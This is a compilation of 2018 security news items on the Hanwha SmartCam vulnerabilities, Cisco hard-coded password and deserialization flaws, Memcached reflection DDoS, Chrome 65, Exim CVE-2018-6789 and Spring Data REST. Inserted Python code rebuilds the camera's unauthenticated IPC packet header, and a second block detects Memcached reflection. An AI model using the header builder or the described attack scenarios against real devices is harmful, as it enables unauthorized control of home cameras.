The researchers at Kaspersky Lab ICS CERT decided to check a popular smart camera to see how well protected it is against cyber attacks. This model has a rich feature list, compares favorably to regular webcams and can be used as a baby monitor, a component in a home security system or as part of a monitoring system.

An initial analysis using publicly available sources showed that there are almost 2,000 of these cameras on the Internet with public IP addresses.

Hanwha SNH-V6410PN/PNW SmartCam: specifications
This device is capable of capturing video with resolutions of 1920×1080, 1280×720 or 640×360, it has night vision capability and a motion sensor, and supports two-way communication, i.e. apart from capturing video and sound it can also produce sound using an in-built speaker. The camera works via a cloud-based service; in other words, it doesn’t connect directly to a device such as a computer. It is configured by creating a wireless hotspot on the camera and connecting it to the main router via Wi-Fi. Users can control the camera from their smartphones, tablets or computers. It should be noted that the camera’s data can only be uploaded to the cloud; there is no other way of communicating between the user and the camera.

The camera is based on the Ambarella S2L system (ARM architecture). Amboot is used as its initial loader. After a standard boot, Amboot loads the Linux kernel with a specific command line as a parameter:

console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc model=SNH-V6410PN ethaddr=************ sn=ZC7D6V2H*********
s=c

After that, systemd launches and the system boots as normal. Different partitions are mounted, and the commands from rc.local are executed. When executing rc.local, the file mainServer is launched in daemon mode; this is the core of the camera’s operation logic. mainServer executes the commands that are sent to it via the UNIX socket /tmp/ipc_path using a binary protocol. Scripts written in PHP as well as CGI are used to process user files. While launching, mainServer opens the UNIX socket /ipc_path. Analysis of the PHP scripts has shown that the main function responsible for communication with mainServer is in the file /work/www/htdocs_weboff/utils/ipc_manager.php.

Interaction with the cameras is via the cloud only

Communication with the user
When a command arrives from the user (e.g., to rotate the camera, select a tracking area, switch to night vision mode, etc.), it is analyzed. Each command or parameter has its own flag assigned to it, which is a constant. The main flags are documented in the file /work/www/htdocs_weboff/utils/constant.php. Later on, the packet header and payload is created, and a request is sent via UNIX socket /tmp/ipc_path to mainServer.

An analysis of the file ipc_manager.php shows that no authentication is used at this stage. The request is sent on behalf of the user ‘admin’.

function makeHeader($cmd, $act, $type, $len){
    $header = array();
    $header = array_fill(0, 77, 0x00);
    $header[HEADER_OFF_MAGIC_NUMBER] = 0xFE;
    $header[HEADER_OFF_MAGIC_NUMBER+1] = 0xFF;
    $header[HEADER_OFF_MAGIC_NUMBER+2] = 0xFE;
    $header[HEADER_OFF_MAGIC_NUMBER+3] = 0xFF;
    $header[HEADER_OFF_MAJOR_VERSION] = MAJOR_VERSION; //Major Version
    $header[HEADER_OFF_MINOR_VERSION] = MINOR_VERSION; //Minor Version
    int2byte($header, $cmd, HEADER_OFF_COMMAND); //Command
    $header[HEADER_OFF_ACTION] = $act; //Action
    $header[HEADER_OFF_MSG_TYPE] = $type; //Type
    $header[HEADER_OFF_ERROR_CODE] = 0xFF; //Error Code
    int2byte($header, $len, HEADER_OFF_MSG_LENGTH); //Length
    str2byte($header, "127.0.0.1", HEADER_OFF_PEER_IP, 40); //Peer IP[40]
    int2byte($header, 80, HEADER_OFF_PEER_PORT); //Peer Port
    str2byte($header, "admin", HEADER_OFF_PEER_ACCOUNT, 16); //Peer Account[16] - Current user name, hard-coded to admin
    $header = array_merge($header, array_fill(0, 8, 0xFF)); //Reserved[8]
    return $header;
}

Example of a request sent on behalf of admin

This method of communicating commands is used both when the camera is driven via the HTTP API and when it is driven via the SmartCam applications. In the latter case, the packet is generated in the application itself and sent to the camera in a message body using the XMPP protocol. When this file is accessed from the outside, via the HTTP API or the SmartCam application, the web server’s digest authentication is the only gate in front of it.
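To make the header layout and its consequence concrete, here is an added Python re-implementation of that makeHeader() logic together with a receiving-side parser; it is not code from the Kaspersky post or from the camera firmware. The HEADER_OFF_* values, the 4-byte little-endian integer encoding and the version numbers are assumptions, since the page names the constants but not their values; the 77-byte header, the magic bytes, the 40-byte IP and 16-byte account fields and the 8 reserved 0xFF bytes come from the page.

```python
"""Re-implementation of the SmartCam IPC header built by ipc_manager.php,
plus a parser for the mainServer side. Offsets, integer width/byte order
and version numbers are ASSUMPTIONS (the page names HEADER_OFF_* constants
but does not give their values)."""
import struct

MAGIC = b"\xfe\xff\xfe\xff"   # from the page: FE FF FE FF
MAJOR_VERSION = 1             # assumed value
MINOR_VERSION = 0             # assumed value
HEADER_LEN = 77               # from the page: array_fill(0, 77, 0x00)
RESERVED = b"\xff" * 8        # from the page: array_fill(0, 8, 0xFF)

# Assumed layout. Field sizes for IP (40) and account (16) come from the page;
# with 4-byte integers these offsets fill the 77 bytes exactly.
OFF_MAGIC, OFF_MAJOR, OFF_MINOR = 0, 4, 5
OFF_COMMAND, OFF_ACTION, OFF_MSG_TYPE, OFF_ERROR_CODE = 6, 10, 11, 12
OFF_MSG_LENGTH, OFF_PEER_IP, OFF_PEER_PORT, OFF_PEER_ACCOUNT = 13, 17, 57, 61
PEER_IP_LEN, PEER_ACCOUNT_LEN = 40, 16


def _put_str(buf, value, off, size):
    """str2byte equivalent: copy an ASCII string into a NUL-padded field."""
    raw = value.encode("ascii")[:size]
    buf[off:off + len(raw)] = raw


def _get_str(data, off, size):
    """Read a NUL-padded ASCII field back out."""
    return data[off:off + size].split(b"\x00", 1)[0].decode("ascii")


def make_header(cmd, act, msg_type, payload_len):
    """Build the header the way the camera's PHP does. Note that peer IP,
    peer port and peer account are constants: every request carries
    'admin', whichever web user actually issued it."""
    buf = bytearray(HEADER_LEN)
    buf[OFF_MAGIC:OFF_MAGIC + 4] = MAGIC
    buf[OFF_MAJOR] = MAJOR_VERSION
    buf[OFF_MINOR] = MINOR_VERSION
    struct.pack_into("<I", buf, OFF_COMMAND, cmd)          # Command
    buf[OFF_ACTION] = act                                  # Action
    buf[OFF_MSG_TYPE] = msg_type                           # Type
    buf[OFF_ERROR_CODE] = 0xFF                             # Error Code
    struct.pack_into("<I", buf, OFF_MSG_LENGTH, payload_len)  # Length
    _put_str(buf, "127.0.0.1", OFF_PEER_IP, PEER_IP_LEN)   # Peer IP[40]
    struct.pack_into("<I", buf, OFF_PEER_PORT, 80)         # Peer Port
    _put_str(buf, "admin", OFF_PEER_ACCOUNT, PEER_ACCOUNT_LEN)  # Peer Account[16]
    return bytes(buf) + RESERVED                           # Reserved[8]


def parse_header(data):
    """mainServer-side view: check framing, then decode the fields."""
    if len(data) < HEADER_LEN + len(RESERVED):
        raise ValueError("header too short")
    if data[OFF_MAGIC:OFF_MAGIC + 4] != MAGIC:
        raise ValueError("bad magic number")
    return {
        "major": data[OFF_MAJOR],
        "minor": data[OFF_MINOR],
        "cmd": struct.unpack_from("<I", data, OFF_COMMAND)[0],
        "act": data[OFF_ACTION],
        "type": data[OFF_MSG_TYPE],
        "error": data[OFF_ERROR_CODE],
        "len": struct.unpack_from("<I", data, OFF_MSG_LENGTH)[0],
        "peer_ip": _get_str(data, OFF_PEER_IP, PEER_IP_LEN),
        "peer_port": struct.unpack_from("<I", data, OFF_PEER_PORT)[0],
        "peer_account": _get_str(data, OFF_PEER_ACCOUNT, PEER_ACCOUNT_LEN),
    }


def is_valid_header(data):
    """True when the bytes frame correctly as an IPC header."""
    try:
        parse_header(data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample: command 0x1234, action 2, type 1, 42-byte payload.
    hdr = make_header(0x1234, 2, 1, 42)
    print(parse_header(hdr))  # peer_account is 'admin' no matter who asked
```

Because the account field never reflects the real web user, the IPC layer has nothing on which to base per-user authorization, which is why the digest authentication in front of the PHP scripts carries the whole load.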

Loopholes for intruders
The following vulnerabilities were identified during the research:

Use of insecure HTTP protocol during firmware update
Use of insecure HTTP protocol during camera interaction via HTTP API
An undocumented (hidden) capability for switching the web interface using the file ‘dnpqtjqltm’
Buffer overflow in file ‘dnpqtjqltm’ for switching the web interface
A feature for the remote execution of commands with root privileges
A capability to remotely change the administrator password
Denial of service for SmartCam
No protection from brute force attacks for the camera’s admin account password
A weak password policy when registering the camera on the server xmpp.samsungsmartcam.com. Attacks against users of SmartCam applications are possible
Communication with other cameras is possible via the cloud server
Blocking of new camera registration on the cloud server
Authentication bypass on SmartCam. Change of administrator password and remote execution of commands.
Restoration of camera password for the SmartCam cloud account
After some additional research we established that these problems exist not only in the camera being researched but in all smart cameras manufactured by Hanwha Techwin. The latter also makes firmware for Samsung cameras.

Below we give a more detailed account of some of our findings.

Undocumented functionality
As mentioned above, we detected, among other things, an undocumented capability that allows manipulation of the camera’s web interface.

Code with undocumented functionality capability in Hanwha SmartCam

Interestingly, a buffer overflow vulnerability was also detected inside it. We reported the undocumented feature to the manufacturer, which has already fixed it.

Vulnerability in the cloud server architecture
Another example of a dangerous vulnerability in this smart camera can be found in the cloud server architecture. Because of a fault in the architecture, an intruder could gain access via the cloud to all cameras and control them.

One of the main problems associated with the cloud architecture is that it is based on the XMPP protocol. Essentially, the entire Hanwha smart camera cloud is a Jabber server. It has so-called rooms, with cameras of one type in each room. An attacker could register an arbitrary account on the Jabber server and gain access to all rooms on that server.

Message sent over XMPP using a test account created for research purposes

Decoded body of the above message

In the process of communicating with the cloud, the camera sends the user’s credentials and a certain set of constants. After analyzing the data sent, a remote attacker is able to register existing cameras in the cloud that have not been registered there yet. As a result, those cameras are subsequently unable to register in the cloud and, as a consequence, are unable to operate. In addition, an attacker can communicate with the cloud on behalf of an arbitrary camera or control arbitrary cameras via the cloud.

Attack scenarios
An interesting attack vector is the spoofing of the DNS server addresses specified in the camera’s settings. This is possible because the update server is specified as a URL in the camera’s configuration file. This type of attack can be implemented even if a camera doesn’t have a global IP address and is located within a NAT subnet, by taking advantage of the peculiarities and vulnerabilities that exist in the Hanwha SmartCam cloud architecture. An attack like this could result in the distribution of modified firmware to cameras with the undocumented functionality loophole preinstalled, which will give privileged rights on those cameras.

If an intruder gains privileged rights (root) on a camera, they gain access to the full Linux functionality. This means the camera can be used as a foothold from which to attack devices located on local (within a NAT subnet) or global networks.

In one attack scenario, an arbitrary camera can be cloned and its image signal spoofed for the end user without much difficulty. To do so, an intruder will have to use cloud interactions to find out the target camera’s model, serial number and MAC address. The attacker then resets the password using a vulnerability in the password generation algorithm and modifies the firmware of the cloned camera (which is an identical camera located on the attacker’s side). The victim’s camera is then remotely disabled. As a result, the victim will receive a video signal from the attacker’s cloned camera.

Other possible scenarios involve attacks on camera users. The camera’s capabilities imply that the user will specify their credentials to different social media and online services, such as Twitter, Gmail, YouTube, etc. This is required for notifications about various events captured by the camera to be sent to the user. An attacker would then be able to exploit this capability to send phishing and spam messages.

Conclusion
What can a potential attacker do with the camera? Our research has demonstrated that they have a number of options.

For one, the attacker can remotely change the administrator’s password, execute arbitrary code on the camera, gain access to an entire cloud of cameras and take control of it, or build a botnet of vulnerable cameras. An attacker can gain access to an arbitrary SmartCam as well as to any Hanwha smart cameras.

What are the implications for a regular user? A remote attacker can gain access to any camera and watch what’s happening, send voice messages to the camera’s on-board speaker, use the camera’s resources for cryptocurrency mining, etc. A remote attacker can also put a camera out of service so it can no longer be restored. We were able to prove this hypothesis three times 🙂

We immediately reported the detected vulnerabilities to the manufacturer. Some vulnerabilities have already been fixed. The remaining vulnerabilities are set to be completely fixed soon, according to the manufacturer.

Fixed vulnerabilities were assigned the following CVEs:

CVE-2018-6294
CVE-2018-6295
CVE-2018-6296
CVE-2018-6297
CVE-2018-6298
CVE-2018-6299
CVE-2018-6300
CVE-2018-6301
CVE-2018-6302
CVE-2018-6303


Cisco Patches Hard-coded Password in PCP Software
9.3.2018 securityweek
Vulnerebility

Cisco this week announced the availability of software updates to address a hard-coded password vulnerability in Cisco Prime Collaboration Provisioning (PCP) Software.

Due to the existence of the hard-coded account password, an unauthenticated, local attacker could log into the underlying Linux operating system. The vulnerability can be abused to connect to the affected system via Secure Shell (SSH) using the hard-coded credentials.

According to Cisco, an attacker successfully exploiting the vulnerability could access the underlying operating system as a low-privileged user. However, the attacker could elevate privileges to root and take full control of the vulnerable system.

Because of the privilege escalation possibility, the vulnerability has a Security Impact Rating (SIR) of Critical, although it was also assessed with a Common Vulnerability Scoring System (CVSS) Base score of 5.9, which would normally come with a SIR of Medium.

The vulnerability impacts Cisco PCP Software release 11.6 only and no prior builds were found to be affected by it, Cisco notes in an advisory. Impacted customers should update to Cisco PCP releases 12.1 and later, as no workarounds that address this vulnerability exist.

The company also notes that it is not aware of “any public announcements or malicious use of the vulnerability.”

This week, the company also addressed CVE-2018-0147, a Critical (CVSS base score of 9.8) vulnerability in Java deserialization used by Cisco Secure Access Control System (ACS), which could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object. An exploit could allow the attacker to execute arbitrary commands on the device with root privileges,” Cisco explains.

The company also addressed a High risk (CVSS base score of 7.3) bug in the FTP server of the Cisco Web Security Appliance (WSA). Due to incorrect FTP user credential validation, an unauthenticated, remote attacker could exploit the bug to log into the server without a valid password or username.

This security issue affects Cisco AsyncOS for WSA Software running any release of Cisco AsyncOS 10.5.1 for WSA Software. Cisco AsyncOS 10.5.2-042 or later releases address the flaw.

Multiple Medium severity bugs were addressed in other Cisco products.


Hardcoded password and Java deserialization flaws found in Cisco products
8.3.2018 securityaffairs
Vulnerebility

The set of security updates recently released by Cisco also includes two advisories for critical vulnerabilities, a hardcoded password, and a Java deserialization flaw.
The latest set of security updates released by Cisco also includes two advisories for critical vulnerabilities.

The first issue is a hardcoded password, tracked as CVE-2018-0141, that affects Cisco’s Prime Collaboration Provisioning (PCP) and that can be exploited by local attackers to gain full control over vulnerable equipment.

The Cisco’s Prime Collaboration Provisioning application allows admins to remotely install and maintain Cisco voice and video solutions.

A local attacker just has to connect to the affected system via Secure Shell (SSH) using the hardcoded password, the

“A vulnerability in Cisco Prime Collaboration Provisioning (PCP) Software could allow an unauthenticated, local attacker to log in to the underlying Linux operating system.” reads the security advisory published by CISCO.

“The vulnerability is due to a hard-coded account password on the system. An attacker could exploit this vulnerability by connecting to the affected system via Secure Shell (SSH) using the hard-coded credentials. “

The hardcoded password grants a local attacker access to a low-privileged user account, but by chaining the vulnerability with other issues the attacker could elevate privileges to root.

The vulnerability has received a Common Vulnerability Scoring System (CVSS) Base score of 5.9, a score normally assigned to medium-severity flaws.

“Although this vulnerability has a Common Vulnerability Scoring System (CVSS) Base score of 5.9, which is normally assigned a Security Impact Rating (SIR) of Medium, there are extenuating circumstances that allow an attacker to elevate privileges to root. For these reasons, the SIR has been set to Critical.” continues Cisco.

Currently, there are no workarounds to address the vulnerability in PCP software, but Cisco has already released patches.

The second critical vulnerability, tracked as CVE-2018-0147, is a Java deserialization flaw that affects Cisco Access Control System (ACS) that can be exploited by an unauthenticated, remote attacker to execute arbitrary commands with root privileges on an affected device.

“A vulnerability in Java deserialization used by Cisco Secure Access Control System (ACS) could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device.” reads the security advisory.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object. An exploit could allow the attacker to execute arbitrary commands on the device with root privileges.”

Cisco has released software updates to fix the flaw.


Memcached DDoS Exploit Code and List of 17,000 Vulnerable Servers Released
7.3.2018 thehackernews
Attack  Vulnerebility

Someone has just released proof-of-concept (PoC) exploit code for the amplification attack and a pre-compiled list of nearly 17,000 potentially vulnerable Memcached servers on the Internet, which could allow even script-kiddies to easily launch massive DDoS attacks using UDP reflection.
Last week we saw two record-breaking DDoS attacks—1.35 Tbps hit Github and 1.7 Tbps attack against an unnamed US-based company—which were carried out using a technique called amplification/reflection attack.
For those unaware, a Memcached-based amplification/reflection attack amplifies the bandwidth of a DDoS attack by a factor of 51,000 by exploiting thousands of misconfigured Memcached servers left exposed on the Internet.
Memcached is a popular open source distributed memory caching system, which came into news earlier last week when researchers detailed how hackers could abuse it to launch amplification/reflection DDoS attack by sending a forged request to the targeted Memcached server on port 11211 using a spoofed IP address that matches the victim's IP.
A few bytes of request sent to a vulnerable Memcached server can trigger a response tens of thousands of times larger directed at the targeted IP address, resulting in a powerful DDoS attack.

For a detailed explanation on how Memcached amplification attack works, you can head on to our previous article.
Since last week, when Memcached was revealed as a new amplification/reflection attack vector, some hacking groups have started exploiting unsecured Memcached servers.

But now the situation will get worse with the release of PoC exploit code, allowing anyone to launch massive DDoS attacks, and will not come under control until the last vulnerable Memcached server is patched, or firewalled on port 11211, or completely taken offline.
Moreover, cybercriminals groups have already started weaponizing this new DDoS technique to threaten big websites for extorting money.
Following last week's DDoS attack on GitHub, Akamai reported its customers received extortion messages delivered alongside the typically "junk-filled" attack payloads, asking them for 50 XMR (Monero coins), valued at over $15,000.
Reflection/amplification attacks are not new. Attackers have previously used this DDoS attack technique to exploit flaws in DNS, NTP, SNMP, SSDP, Chargen and other protocols in order to maximize the scale of their cyber attacks.
To mitigate the attack and prevent Memcached servers from being abused as reflectors, the best option is to bind Memcached to a local interface only or entirely disable UDP support if not in use.
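Two defensive checks for the points above, written as an added example for this article rather than code from Memcached or from any of the parties quoted here: `detect_reflection` scores UDP/11211 exchanges in flow records by the ratio of reply bytes to request bytes, which is the signature of the spoofed-source reflection described above, and `audit_memcached_args` reports a daemon command line that still has UDP enabled or is bound to every interface, the two settings the mitigation paragraph says to change. The flow records, the 100x threshold and the IP addresses (taken from the documentation ranges) are constructed sample values; `-U` and `-l` are real memcached options.

```python
"""Flag Memcached reflection in network flow records and audit the daemon's
listen options. Added example for this article, not code from Memcached or
from any vendor named here; the flow records below are constructed sample
data, not captured traffic."""
from collections import defaultdict
from dataclasses import dataclass

MEMCACHED_PORT = 11211
# Reply bytes divided by request bytes for one server/peer pair. A real client
# never sees anything near the 51,000x amplification the article describes,
# so a conservative threshold (constructed value) still separates abuse from
# normal traffic.
SUSPICIOUS_AMPLIFICATION = 100.0


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str   # "udp" or "tcp"
    nbytes: int


def detect_reflection(flows):
    """Return {(server, peer): amplification} for UDP Memcached exchanges whose
    reply volume dwarfs the request volume. In a reflection attack 'peer' is the
    spoofed source address, i.e. the victim that receives the amplified replies."""
    requests = defaultdict(int)   # (server, peer) -> bytes received on 11211/udp
    replies = defaultdict(int)    # (server, peer) -> bytes sent from 11211/udp
    for f in flows:
        if f.proto != "udp":
            continue              # a TCP handshake cannot be completed from a spoofed address
        if f.dport == MEMCACHED_PORT:
            requests[(f.dst, f.src)] += f.nbytes
        elif f.sport == MEMCACHED_PORT:
            replies[(f.src, f.dst)] += f.nbytes
    findings = {}
    for key, out_bytes in replies.items():
        in_bytes = requests.get(key, 0)
        # Replies with no matching request at all are the most suspicious case.
        ratio = out_bytes / in_bytes if in_bytes else float("inf")
        if ratio >= SUSPICIOUS_AMPLIFICATION:
            findings[key] = ratio
    return findings


def audit_memcached_args(argv):
    """Report weak settings in a memcached command line. Returns a list of
    problems; an empty list means UDP is off (-U 0) and the daemon is bound to
    a specific address (-l). A missing -U is treated as UDP enabled, which was
    the default before memcached 1.5.6 turned it off. Comma-separated -l lists
    are not expanded here."""
    opts = {}
    args = iter(argv[1:])
    for tok in args:
        if tok in ("-U", "-l", "-p"):
            opts[tok] = next(args, None)
    problems = []
    udp_port = opts.get("-U")
    if udp_port != "0":
        problems.append("UDP reflector: port %s is enabled, pass -U 0 unless UDP clients exist"
                        % (udp_port or "11211 (default)"))
    listen = opts.get("-l")
    if listen is None or listen in ("0.0.0.0", "::"):
        problems.append("bound to all interfaces: pass -l 127.0.0.1 or an internal address")
    return problems


# Constructed sample flows: 203.0.113.10 is an exposed cache, 198.51.100.7 the
# spoofed victim address, 10.0.0.x are legitimate internal clients.
SAMPLE_FLOWS = [
    Flow("198.51.100.7", 40000, "203.0.113.10", 11211, "udp", 15),
    Flow("203.0.113.10", 11211, "198.51.100.7", 40000, "udp", 750000),
    Flow("10.0.0.5", 50000, "203.0.113.10", 11211, "tcp", 120),
    Flow("203.0.113.10", 11211, "10.0.0.5", 50000, "tcp", 600),
    Flow("10.0.0.6", 50001, "203.0.113.10", 11211, "udp", 40),
    Flow("203.0.113.10", 11211, "10.0.0.6", 50001, "udp", 400),
]

if __name__ == "__main__":
    for (server, victim), ratio in detect_reflection(SAMPLE_FLOWS).items():
        print("reflector %s -> victim %s, amplification %.0fx" % (server, victim, ratio))
    for problem in audit_memcached_args(["memcached", "-U", "11211", "-l", "0.0.0.0"]):
        print("weak setting:", problem)
```

Bound to 127.0.0.1 with `-U 0`, the audit returns no findings. Run the detection over exported flow records keyed the same way, and treat any hit as a server to firewall on UDP 11211 until it is reconfigured.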


Chrome 65 Patches 45 Vulnerabilities
7.3.2018 securityweek 
Vulnerebility

Released in the stable channel this week, Chrome 65 brings 45 security fixes, including 27 patches for vulnerabilities discovered by external researchers.

The browser also includes an updated JavaScript engine, namely V8 version 6.5. Announced in early February and initially made available in Chrome 65 Beta, the new V8 engine includes an untrusted code mode meant to mitigate the latest speculative side-channel attack called Spectre.

The 27 vulnerabilities reported by researchers include 9 security flaws assessed with a High severity rating, 15 bugs considered Medium risk, and 3 issues with a Low severity rating.

Google rewarded the researchers over $34,000 in bug bounties, but hasn’t provided details on all payouts in the published advisory.

The most important of the addressed bugs are two High risk use-after-free vulnerabilities in Flash (CVE-2018-6058 and CVE-2018-6059). Both were reported by JieZeng of Tencent Zhanlu Lab in August 2017 and were awarded a $5,000 bounty each.

Google also addressed a Use after free in Blink (CVE-2018-6060) and a Race condition in V8 (CVE-2018-6061) – two High severity flaws awarded $3,000 each –, as well as a Heap buffer overflow in Skia (CVE-2018-6062) – awarded $1,000.

Other High risk issues resolved in Chrome 65 include two incorrect permissions on shared memory bugs, one Type confusion in V8, and one Integer overflow in V8.

The most important of the Medium risk issues was CVE-2018-6066, a Same Origin Bypass via canvas that was awarded a $4,000 bounty.

Other Medium severity issues addressed in this release include Buffer overflow in Skia, Object lifecycle issues in Chrome Custom Tab, Stack buffer overflow in Skia, CSP bypass through extensions, Heap buffer overflow in Skia, Integer overflow in PDFium, Heap buffer overflow in WebGL, and Mark-of-the-Web bypass.

Google also addressed an overly permissive cross origin download, incorrect handling of URL fragment identifiers in Blink, a timing attack using SVG filters, URL Spoof in OmniBox, Information disclosure via texture data in WebGL, and Information disclosure in IPC call.

The three Low risk bugs resolved in the browser include XSS in interstitials, circumvention of port blocking, and incorrect processing of AppManifests.

The new application release is available for download as version Chrome 65.0.3325.146 for Windows, Mac and Linux computers. Chrome for Android has been updated as well, now available as version 65.0.3325.109.


RCE flaw in Exim MTA affects half of the email servers online
7.3.2018 securityaffairs
Vulnerebility

A critical RCE vulnerability in the Exim mail transfer agent (MTA), tracked as CVE-2018-6789, affects most of the email servers online.
A critical remote code execution vulnerability in the Exim mail transfer agent (MTA), tracked as CVE-2018-6789, affects most of the email servers online. It has been estimated that, as of March 2017, the total number of Internet email servers running Exim was over 560,000, which corresponds to 56% of all mail (MX) servers online.

“We reported an overflow vulnerability in the base64 decode function of Exim on 5 February, 2018, identified as CVE-2018-6789. This bug exists since the first commit of exim, hence ALL versions are affected.” reads the blog post published by security firm Devcore.

“According to our research, it can be leveraged to gain Pre-auth Remote Code Execution and at least 400k servers are at risk. Patched version 4.90.1 is already released and we suggest to upgrade exim immediately.”

According to Shodan, the number of Exim Servers exposed online is more than 4 million, most of them in the US.

Exim

The flaw was discovered by the security researcher Meh Chang, who reported it to the Exim maintainers on February 2.

On February 10, the Exim team released Exim version 4.90.1 that addresses the flaw.

The researchers developed an exploit targeting Exim’s SMTP daemon that leverages a one-byte buffer overflow in Exim’s base64 decode function by tricking the memory management mechanism.

“There is a buffer overflow in base64d(), if some pre-conditions are met. Using a handcrafted message, remote code execution seems to be possible. A patch exists already and is being tested.” reads the security advisory published by the Exim team.

Exim server owners should install the Exim 4.90.1 update as soon as possible.

Below is the vulnerability timeline (UTC):

2018-02-05 Report from Meh Chang <meh@devco.re> via exim-security mailing list
2018-02-06 Request CVE on https://cveform.mitre.org/ (heiko) CVE-2018-6789
2018-02-07 Announcement to the public via exim-users, exim-maintainers mailing lists and on oss-security mailing list
2018-02-08 16:50 Grant restricted access to the security repo for distro maintainers
2018-02-09 One distro breaks the embargo
2018-02-10 18:00 Grant public access to our official git repo.
In November the Exim team warned of other flaws through the public bug tracker.


Kaspersky Lab Offers $100,000 for Critical Vulnerabilities
6.3.2018 securityweek
Vulnerebility

Just days before its annual Security Analyst Summit kicks off in Cancun, Mexico, Kaspersky Lab this week announced an extension to its bug bounty program and plans to pay rewards of up to $100,000 for severe vulnerabilities in some of its products.

Launched in August 2016, the HackerOne-powered bug bounty program initially promised a total of $50,000 in bounties and resulted in the discovery of more than 20 flaws in the first six months. To date, the program allowed Kaspersky to address more than 70 bugs in its products and services.

In April last year, the Moscow-based security firm announced the addition of Kaspersky Password Manager 8 to the bounty program, along with an increase in the maximum reward for remote code execution vulnerabilities from $2,000 to $5,000.

The newly announced larger payouts represent a 20-fold increase on existing rewards available to researchers who participate in the company’s bug bounty program, which is available to all members of the HackerOne platform.

The largest rewards will be offered for the discovery and coordinated disclosure of bugs that enable remote code execution via the product database update channel, Kaspersky says. Another requirement is that the launch of the code takes place in the product’s high privilege process and silently from the user, and that persistence is also achieved.

Security flaws leading to other types of remote code execution will receive rewards ranging from $5,000 to $20,000, depending on their complexity level. The company also announced it is willing to pay researchers who discover bugs allowing local privilege escalation or leading to sensitive data disclosure.

Only previously unknown vulnerabilities discovered in Kaspersky Internet Security 2019 (the most recent beta) and Kaspersky Endpoint Security 11 (the most recent beta) qualify for the bug bounties. Supported platforms include desktop Windows 8.1 and higher, with the most recent updates installed.

“Finding and fixing bugs is a priority for us as a software company. We invite security researchers to make sure there are no vulnerabilities in our products. The immunity of our code and highest levels of protection that we offer customers is a core principle of our business – and a fundamental pillar of our Global Transparency Initiative,” Eugene Kaspersky, CEO of Kaspersky Lab, said.

Announced in October 2017, the Global Transparency Initiative was meant to clear Kaspersky’s name after reports suggested it had ties to the Russian government and the Department of Homeland Security (DHS) ordered all government agencies to stop using the company’s products.


Cisco Adds Vulnerability Identification to Tetration Platform
6.3.2018 securityweek
Vulnerebility

Cisco today announced the availability of identification of software vulnerabilities and exposures as part of the security capabilities of its Tetration platform.

Designed to offer workload protection for multi-cloud data centers through a zero-trust model that employs segmentation, the platform can now also detect vulnerabilities associated with software installed on servers.

With support for both on-premises and public cloud workloads, Tetration can now help identify security incidents faster, as well as contain lateral movement, in addition to reducing attack surface, Cisco says.

“Tetration is equipped to identify high severity security events such as Spectre and Meltdown using behavior-based anomalies,” Cisco notes.

The platform maintains an inventory of the software packages installed on the server, along with information on version and publisher. Leveraging the Common Vulnerabilities and Exposures (CVE) database, Tetration can detect packages with known CVEs.

The platform also offers a scorecard ranking the severity of specific vulnerabilities and reveals which servers might be affected, thus helping IT organizations proactively set up filters to find additional vulnerabilities.

Now, Tetration can also collect and maintain information about running processes on each server, on a real-time basis, Cisco announced. This should help IT managers find servers on which specific processes are running or have run. The collected information includes ID, parameters, duration, hash (signature), and the user running the process.

The identification of application behavior deviations from the baseline is also available on the platform, through the monitoring of workloads and networks for behavior that might be suspicious. Tetration first creates an application behavior baseline and then keeps an eye out for any deviations to identify attacks.

“For example, a process might seek to obtain privileged access that it should not have under normal behavior and use that privilege to execute a series of operations. Tetration can provide a time-series view of history to visualize process hierarchy and behavior information,” Cisco says.

The platform can search for specific process events and discover details such as privilege escalation, shell code execution, and side channel attacks.

According to Cisco, process behavior monitoring and identification of vulnerabilities allow Tetration to identify anomalies in minutes and reduce the attack surface up to 85%, while efficient application segmentation minimizes lateral movement. Furthermore, automation allows for a 70% reduction in human intervention to enable a zero-trust model.

“Tetration is powered by big data technologies to support the scale requirements of data centers. It can process comprehensive telemetry information received from servers in real-time (up to 25,000 servers per cluster). Tetration can enforce consistent policy across thousands of applications and tens of millions of policy rules,” Cisco notes.


Critical flaw in Pivotal’s Spring Data REST allows to hack any machine that runs an application built on its components
5.3.2018 securityaffairs
Vulnerebility

A critical flaw in Pivotal’s Spring Data REST allows remote attackers to execute arbitrary commands on any machine that runs an application built using its components.
Pivotal’s Spring Data REST project is affected by a critical vulnerability, tracked as CVE-2017-8046, that was discovered by security researchers at Semmle/lgtm.

Pivotal’s Spring Framework is a platform widely used by development teams for building web applications.

Spring Data REST builds on top of Spring Data repositories; it exposes hypermedia-driven HTTP resources (collection, item, and association resources representing your model) for aggregates contained in the model.

The components included in Spring Data REST are used by developers to build Java applications that offer RESTful APIs to underlying Spring Data repositories.

The vulnerability is similar to the weaknesses found in Apache Struts that resulted in the Equifax data breach.

“Security researchers at lgtm.com have discovered a critical remote code execution vulnerability that affects various projects in Pivotal Spring, the world’s most popular framework for building web applications.” reads the security advisory published by Semmle/lgtm. “The vulnerability allows attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.”

Pivotal's Spring Data REST

This flaw is tied to the way Spring’s own expression language (SpEL) is used in the Data REST component. The lack of validation of user input allows an attacker to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

“Virtually every modern web application will contain components that communicate through REST interfaces, ranging from online travel booking systems, mobile applications and internet banking services,” continues the advisory.

Pivotal issued a security patch for a vulnerability it refers to as DATAREST-1127 as part of its Spring Boot 2.0 update.

“Malicious PATCH requests submitted to spring-data-rest servers can use specially crafted JSON data to run arbitrary Java code.” reads the security advisory published by Pivotal.

Researchers from lgtm.com worked closely with Pivotal to fix the issue and coordinate its public disclosure; the intent was to give Spring Data REST users sufficient time to update their apps.

The experts urge users to apply the fix because the flaw allows remote attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

The exploitation of the flaw in RESTful APIs could allow hackers to easily gain control over production servers and access sensitive information.

